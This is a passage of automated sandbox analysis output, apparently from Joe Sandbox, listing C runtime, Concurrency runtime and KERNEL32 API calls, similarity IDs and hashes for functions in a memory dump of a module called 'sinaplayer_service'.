                                                                                                                                                                                                    • _wcsnlen.LIBCMT(-00000002,00007FFF,?,?,00000000,00000007,?,6D0B1179,?,?,6D0B11A0,0000000C), ref: 6D0DFD6A
                                                                                                                                                                                                    • wcslen.MSVCR120(?,?,?,00000000,00000007,?,6D0B1179,?,?,6D0B11A0,0000000C), ref: 6D0DFD76
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000002,?,?,?,00000000,00000007,?,6D0B1179,?,?,6D0B11A0,0000000C), ref: 6D0DFD81
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(00000000,00000001,?), ref: 6D0DFD97
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,00000000,00000007,?,6D0B1179,?,?,6D0B11A0,0000000C), ref: 6D0DFDA4
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,00000000,00000007,?,6D0B1179,?,?,6D0B11A0,0000000C), ref: 6D0DFDAF
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D0DFDCB
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0DFDEE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide_errno$_calloc_crt_invalid_parameter_noinfo_wcsnlenfreewcscpy_s$wcschr$strlenwcslen
                                                                                                                                                                                                    • String ID: *\
                                                                                                                                                                                                    • API String ID: 3308320376-3401207301
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _mbschr.MSVCR120(00000000,0000003D,005C2D90,00000000,00000000,00000000), ref: 6D0B0F4E
                                                                                                                                                                                                      • Part of subcall function 6D0B12F9: _mbschr_l.MSVCR120(00000000,005C2D90,00000000,?,6D0B0F53,00000000,0000003D,005C2D90,00000000,00000000,00000000), ref: 6D0B1304
                                                                                                                                                                                                    • free.MSVCR120(00000000,005C2D90,00000000,00000000,00000000), ref: 6D0B0FA9
                                                                                                                                                                                                    • _errno.MSVCR120(005C2D90,00000000,00000000,00000000), ref: 6D0B0FBE
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000000), ref: 6D0E05EA
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,00000000), ref: 6D0E05F5
                                                                                                                                                                                                    • ___wtomb_environ.LIBCMT ref: 6D0E0626
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000004,005C2D90,00000000,00000000,00000000), ref: 6D0E064D
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000004,005C2D90,00000000,00000000,00000000), ref: 6D0E066A
                                                                                                                                                                                                    • free.MSVCR120(005C2A20,005C2D90,00000000,00000000,00000000), ref: 6D0E0698
                                                                                                                                                                                                    • __recalloc_crt.LIBCMT(00000001,00000004,005C2D90,00000000,00000000,00000000), ref: 6D0E06CE
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,00000001,?,00000000,00000000), ref: 6D0E0735
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(-00000002,00000001,?,00000000,00000000), ref: 6D0E073F
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,00000000,?,00000000,00000000), ref: 6D0E074E
                                                                                                                                                                                                    • strcpy_s.MSVCR120(00000000,-00000002,00000000,?,00000000,00000000), ref: 6D0E0759
                                                                                                                                                                                                    • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 6D0E077C
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,00000000,00000000), ref: 6D0E078A
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,?,?,?,00000000,00000000), ref: 6D0E0796
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,00000000,00000000), ref: 6D0E07A3
                                                                                                                                                                                                      • Part of subcall function 6D0B0EE6: _mbsnbicoll.MSVCR120(00000000,00000000,005C2D90,005C2A20,00000000,?,6D0B0F92,00000000,00000000,005C2D90,00000000,00000000,00000000), ref: 6D0B0F01
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 6D0E07BB
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$_errno$_malloc_crtstrlen$EnvironmentVariable___wtomb_environ__recalloc_crt_calloc_crt_invalid_parameter_noinfo_invoke_watson_mbschr_mbschr_l_mbsnbicollstrcpy_s
                                                                                                                                                                                                    • String ID: *\
                                                                                                                                                                                                    • API String ID: 1943959764-3401207301
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wcsrchr.MSVCR120(?,0000005C), ref: 6D0B20BB
                                                                                                                                                                                                    • wcsrchr.MSVCR120(?,0000002F,?,0000005C), ref: 6D0B20C5
                                                                                                                                                                                                    • wcsrchr.MSVCR120(00000000,0000002E), ref: 6D0B20E4
                                                                                                                                                                                                    • _waccess_s.MSVCR120(?,00000000), ref: 6D0B20F6
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0B2126
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D4BAA
                                                                                                                                                                                                    • wcschr.MSVCR120(?,0000003A), ref: 6D0D4BBA
                                                                                                                                                                                                    • wcslen.MSVCR120(?), ref: 6D0D4BCC
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000003,00000002,?), ref: 6D0D4BD7
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(00000000,00000003,6D0E2178), ref: 6D0D4BEC
                                                                                                                                                                                                    • wcscat_s.MSVCR120(00000000,00000003,?), ref: 6D0D4BFF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wcsrchr$_calloc_crt_errno_invalid_parameter_noinfo_waccess_swcscat_swcschrwcscpy_swcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 501526102-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Name::operator+$NameName::
                                                                                                                                                                                                    • String ID: D6m$`anonymous namespace'
                                                                                                                                                                                                    • API String ID: 168861036-1987170193
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0A4A47
                                                                                                                                                                                                    • Concurrency::SchedulerPolicy::SchedulerPolicy.LIBCMT(?,00000038,6D0A6A9C,6D0948CA,0000000C,6D0A3D89,0000000C,6D0A3E4B,?,00000000,?,6D0A3A7E,?,6D0948CA), ref: 6D0A4A62
                                                                                                                                                                                                      • Part of subcall function 6D0A6F6A: ??2@YAPAXI@Z.MSVCR120(00000028,00000180,?,6D0A4A67,?,00000038,6D0A6A9C,6D0948CA,0000000C,6D0A3D89,0000000C,6D0A3E4B,?,00000000,?,6D0A3A7E), ref: 6D0A6F72
                                                                                                                                                                                                      • Part of subcall function 6D0A6F6A: memcpy.MSVCR120(00000000,?,00000028,00000028,00000180,?,6D0A4A67,?,00000038,6D0A6A9C,6D0948CA,0000000C,6D0A3D89,0000000C,6D0A3E4B,?), ref: 6D0A6F81
                                                                                                                                                                                                      • Part of subcall function 6D0A433D: ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0A4382
                                                                                                                                                                                                      • Part of subcall function 6D0A433D: memset.MSVCR120(00000000,00000000,?,00000000), ref: 6D0A4392
                                                                                                                                                                                                      • Part of subcall function 6D0A433D: ??2@YAPAXI@Z.MSVCR120(0000000C,00000000,00000000,?,00000000), ref: 6D0A4399
                                                                                                                                                                                                      • Part of subcall function 6D0A433D: ??_U@YAPAXI@Z.MSVCR120(00000000,?,?,00000180,00000000,6D0A4A97), ref: 6D0A43C3
                                                                                                                                                                                                      • Part of subcall function 6D0A433D: InitializeSListHead.KERNEL32(?,?,?,00000180,00000000,6D0A4A97), ref: 6D0A43D8
                                                                                                                                                                                                      • Part of subcall function 6D0A433D: InitializeSListHead.KERNEL32(00000180,?,?,00000180,00000000,6D0A4A97), ref: 6D0A43DE
                                                                                                                                                                                                      • Part of subcall function 6D0A43FE: ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0A4443
                                                                                                                                                                                                      • Part of subcall function 6D0A43FE: memset.MSVCR120(00000000,00000000,?,00000000), ref: 6D0A4453
                                                                                                                                                                                                      • Part of subcall function 6D0A43FE: ??2@YAPAXI@Z.MSVCR120(0000000C,00000000,00000000,?,00000000), ref: 6D0A445A
                                                                                                                                                                                                      • Part of subcall function 6D0A43FE: ??_U@YAPAXI@Z.MSVCR120(00000000,?,?,00000180,00000000,6D0A4AC1), ref: 6D0A4484
                                                                                                                                                                                                      • Part of subcall function 6D0A43FE: InitializeSListHead.KERNEL32(?,?,?,00000180,00000000,6D0A4AC1), ref: 6D0A4499
                                                                                                                                                                                                      • Part of subcall function 6D0A43FE: InitializeSListHead.KERNEL32(?,?,?,00000180,00000000,6D0A4AC1), ref: 6D0A449F
                                                                                                                                                                                                    • ??0_ReentrantBlockingLock@details@Concurrency@@QAE@XZ.MSVCR120(?,?,?,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D0A4AC7
                                                                                                                                                                                                      • Part of subcall function 6D0A5C29: __crtInitializeCriticalSectionEx.MSVCR120(?,00000000,00000180,6D0A4ACC,?,?,?,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D0A5C35
                                                                                                                                                                                                      • Part of subcall function 6D0A4A04: ??_U@YAPAXI@Z.MSVCR120(00000000,?,?,?,00000180,6D0A4B22), ref: 6D0A4A21
                                                                                                                                                                                                      • Part of subcall function 6D0A4A04: memset.MSVCR120(00000000,00000000,?,00000000,?,?,?,00000180,6D0A4B22), ref: 6D0A4A32
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?), ref: 6D0A4BC6
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?), ref: 6D0A4BCF
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?), ref: 6D0A4BD8
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?), ref: 6D0A4BE1
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000000), ref: 6D0A4BED
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000004,00000000), ref: 6D0A4BFA
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000007,00000004,00000000), ref: 6D0A4C08
                                                                                                                                                                                                      • Part of subcall function 6D0A58DA: __EH_prolog3.LIBCMT ref: 6D0A58E1
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000001,00000007,00000004,00000000), ref: 6D0A4C1C
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000001,00000001,00000007,00000004,00000000), ref: 6D0D2ED9
                                                                                                                                                                                                      • Part of subcall function 6D0A6F10: TlsAlloc.KERNEL32 ref: 6D0A6F16
                                                                                                                                                                                                      • Part of subcall function 6D0A3C0B: __crtCreateEventExW.MSVCR120(00000000,00000000,00000000,001F0002), ref: 6D0A3C1B
                                                                                                                                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,6D0F39D0,?,000000FF,00000000), ref: 6D0A4C60
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120 ref: 6D0A4C6E
                                                                                                                                                                                                      • Part of subcall function 6D0A3E7E: __EH_prolog3.LIBCMT ref: 6D0A3E85
                                                                                                                                                                                                      • Part of subcall function 6D0A6FED: ___crtSetThreadpoolTimer.LIBCMT ref: 6D0A7032
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0D2EE3
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6D0D2EF9
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000), ref: 6D0D2F07
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,00000000), ref: 6D0D2F0C
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6D0D2F22
                                                                                                                                                                                                    • CreateTimerQueueTimer.KERNEL32(?,00000000,6D0F3192,?,7FFFFFFF,7FFFFFFF,00000000), ref: 6D0D2F46
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0D2F54
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6D0D2F6A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Policy$Initialize$HeadList$Concurrency@@Scheduler$ElementKey@2@@Policy@Value@$??2@Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorH_prolog3LastTimermemset$CreateVersion@__crt$??0_AllocBlockingConcurrency::CriticalEventExceptionLock@details@Manager@1@ObjectPolicy::QueueReentrantRegisterResourceSectionSingleThreadpoolThrowWait___crtmemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1785735614-0
                                                                                                                                                                                                    • Opcode ID: 3718969962b9c4e3ce0ff23a60fa1c085438578a210c376e401ec81b33026698
                                                                                                                                                                                                    • Instruction ID: 6096c406952c03f8efbe40ba752cd03fa789241b2cf015980b3f1759e3735b4c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3718969962b9c4e3ce0ff23a60fa1c085438578a210c376e401ec81b33026698
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12912CB0A05646FFE748DFBAC584BE9FBA4BF09304F55422ED52C97281DB30A520CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D08104C
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000004), ref: 6D0A1630
                                                                                                                                                                                                      • Part of subcall function 6D092226: malloc.MSVCR120(6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D092237
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000180,00000002,00000004), ref: 6D0A163F
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000180,00000001,00000180,00000002,00000004), ref: 6D0A164E
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000180,00000001,00000180,00000001,00000180,00000002,00000004), ref: 6D0A165D
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000101,00000001,00000180,00000001,00000180,00000001,00000180,00000002,00000004), ref: 6D0A166C
                                                                                                                                                                                                    • GetCPInfo.KERNEL32(?,?), ref: 6D0A16BC
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(00000000,?,00000100,?,000000FF,?,000000FF,?,00000000), ref: 6D0A1703
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(00000000,?,00000200,?,000000FF,?,000000FF,?,00000000), ref: 6D0A1735
                                                                                                                                                                                                    • ___crtGetStringTypeA.LIBCMT ref: 6D0A1766
                                                                                                                                                                                                    • memcpy.MSVCR120(?,?,000000FE), ref: 6D0A17B5
                                                                                                                                                                                                    • memcpy.MSVCR120(?,?,0000007F,?,?,000000FE), ref: 6D0A17C7
                                                                                                                                                                                                    • memcpy.MSVCR120(?,?,0000007F,?,?,0000007F,?,?,000000FE), ref: 6D0A17D9
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D0A1831
                                                                                                                                                                                                      • Part of subcall function 6D08ECE0: HeapFree.KERNEL32(00000000,00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D08ECF4
                                                                                                                                                                                                    • free.MSVCR120(?,?), ref: 6D0DF709
                                                                                                                                                                                                    • free.MSVCR120(?,?,?), ref: 6D0DF711
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?), ref: 6D0DF719
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$_calloc_crt$Stringmemcpy$__crt$FreeHeapInfoType___crt_malloc_crtmalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 356976373-0
                                                                                                                                                                                                    • Opcode ID: 2b38928cfd75d054c800e3741a28308003ba01db7dac290e8cd223085b10e812
                                                                                                                                                                                                    • Instruction ID: 0f6bcc045ec1e2e69fff07818a77628906453e2f897832aedacbfe356d79cb1b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b38928cfd75d054c800e3741a28308003ba01db7dac290e8cd223085b10e812
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ABB19FB0D043869BEF11CFB8C881BEEBBF9BF09304F14452DE565A7292DB75A8418B51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0EFC19
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(000000A8), ref: 6D0EFC4A
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E754C,6D15CEE8), ref: 6D0EFC5F
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(000000A8), ref: 6D0EFC7F
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,?,?,?,?,?,000000A8), ref: 6D0EFCAB
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,?,?,?,?,?,?,?,?,000000A8), ref: 6D0EFCD9
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,000000A8), ref: 6D0EFD09
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,?,?,?,?,?,?,?,?,?,?,?,?,000000A8), ref: 6D0EFE8E
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,?,?,?,?,?,?,?,000000A8), ref: 6D0EFEBB
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 6D0EFF4C
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,000000A8), ref: 6D0EFF5E
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,?,?,?,?,000000A8), ref: 6D0EFF64
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000008,?,?,?,?,000000A8), ref: 6D0EFF6D
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(00000000,?,?,?,?,000000A8), ref: 6D0EFFA7
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,?,?,?,?,?,?,000000A8), ref: 6D0EFFD7
                                                                                                                                                                                                      • Part of subcall function 6D11DD30: std::exception::_Copy_str.LIBCMT(?,?,?,6D11DD23,?,?,?,6D0DB529,Attempted a typeid of NULL pointer!,6D0940D0,00000014), ref: 6D11DD49
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: std::exception::exception$??0exception@std@@free$??2@CleanupConcurrency::details::Copy_strExceptionH_prolog3InformationManager::ResourceThrowTopologystd::exception::_
                                                                                                                                                                                                    • String ID: count$pGroupAffinity
                                                                                                                                                                                                    • API String ID: 2906875064-3379709940
                                                                                                                                                                                                    • Opcode ID: 32050dfdb79509a64e79fc0dfa7dbdb96be2e6a1bb31713fb374f350a1a40061
                                                                                                                                                                                                    • Instruction ID: a317a7b99209b254baa857961a7ea4cfdd8ada844f36a5271f07b20bd72d4ea2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32050dfdb79509a64e79fc0dfa7dbdb96be2e6a1bb31713fb374f350a1a40061
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96C14A71D0421A8FEB14CFA9D9807EEFBF5BF48340F50856AD915AB241EB70AA41CF91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0EBA69
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E754C,6D15CEE8,?,0000009C,6D0EB7F8,?,00000001,00000001), ref: 6D0EBA98
                                                                                                                                                                                                      • Part of subcall function 6D0992EB: RaiseException.KERNEL32(?,?,?,6D0AC7FC,?,?,?,?,?,6D0DDA6A,?,6D0AC7FC,?,00000001), ref: 6D099333
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,0000009C,6D0EB7F8,?,00000001,00000001,?,E18D5491,00000000,6D0E923C), ref: 6D0EBAD2
                                                                                                                                                                                                    • ?wait@event@Concurrency@@QAEII@Z.MSVCR120(?,0000009C,6D0EB7F8,?,00000001,00000001,?,E18D5491,00000000,6D0E923C), ref: 6D0EBAE9
                                                                                                                                                                                                    • ??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR120(?,?,?,?,00000000,0000009C,6D0EB7F8,?,00000001,00000001,?,E18D5491,00000000,6D0E923C), ref: 6D0EBB55
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,0000009C,6D0EB7F8,?,00000001,00000001,?,E18D5491,00000000,6D0E923C), ref: 6D0EBA83
                                                                                                                                                                                                      • Part of subcall function 6D11DD30: std::exception::_Copy_str.LIBCMT(?,?,?,6D11DD23,?,?,?,6D0DB529,Attempted a typeid of NULL pointer!,6D0940D0,00000014), ref: 6D11DD49
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(6D0E923C,0000009C,6D0EB7F8,?,00000001,00000001,?,E18D5491,00000000), ref: 6D0EBBC7
                                                                                                                                                                                                    • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR120(?,?,?,?,00000000,0000009C,6D0EB7F8,?,00000001,00000001,?,E18D5491,00000000,6D0E923C), ref: 6D0EBBFA
                                                                                                                                                                                                    • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR120 ref: 6D0EBC57
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,?,?,00000000,0000009C,6D0EB7F8,?,00000001,00000001,?,E18D5491,00000000,6D0E923C), ref: 6D0EBCBA
                                                                                                                                                                                                      • Part of subcall function 6D0A3E7E: __EH_prolog3.LIBCMT ref: 6D0A3E85
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,00000001,E18D5491,00000000,6D0E923C), ref: 6D0EBCFE
                                                                                                                                                                                                      • Part of subcall function 6D0A6FED: ___crtSetThreadpoolTimer.LIBCMT ref: 6D0A7032
                                                                                                                                                                                                    • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR120(?,?,?,00000000,0000009C,6D0EB7F8,?,00000001,00000001,?,E18D5491,00000000,6D0E923C), ref: 6D0EBD1D
                                                                                                                                                                                                    • CreateTimerQueueTimer.KERNEL32(00000001,00000000,6D0EC02B,?,?,00000000,00000020,?,?,?,00000000,0000009C,6D0EB7F8,?,00000001,00000001), ref: 6D0EBD31
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,00000001), ref: 6D0EBD4B
                                                                                                                                                                                                    • ?Block@Context@Concurrency@@SAXXZ.MSVCR120(?,?,?,00000000,0000009C,6D0EB7F8,?,00000001,00000001,?,E18D5491,00000000,6D0E923C), ref: 6D0EBD67
                                                                                                                                                                                                    • Concurrency::details::MultiWaitBlock::NotifyCompletedNode.LIBCMT ref: 6D0EBD8E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency@@$std::exception::exception$Timer$?unlock@critical_section@ExceptionH_prolog3Version@$??0scoped_lock@critical_section@?wait@event@Block::Block@CompletedConcurrency::details::Context@Copy_strCreateManager@1@MultiNodeNotifyQueueQueue@details@RaiseResourceSharedThreadpoolThrowV12@@Wait___crtstd::exception::_
                                                                                                                                                                                                    • String ID: pEvents
                                                                                                                                                                                                    • API String ID: 4129581172-2498624650
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformationEx,?,00000000,00000000,0000FFFF,6D0D25E8,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004), ref: 6D0A7B47
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6D0A7B4E
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,0000FFFF,6D0D25E8,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E), ref: 6D0A7B6E
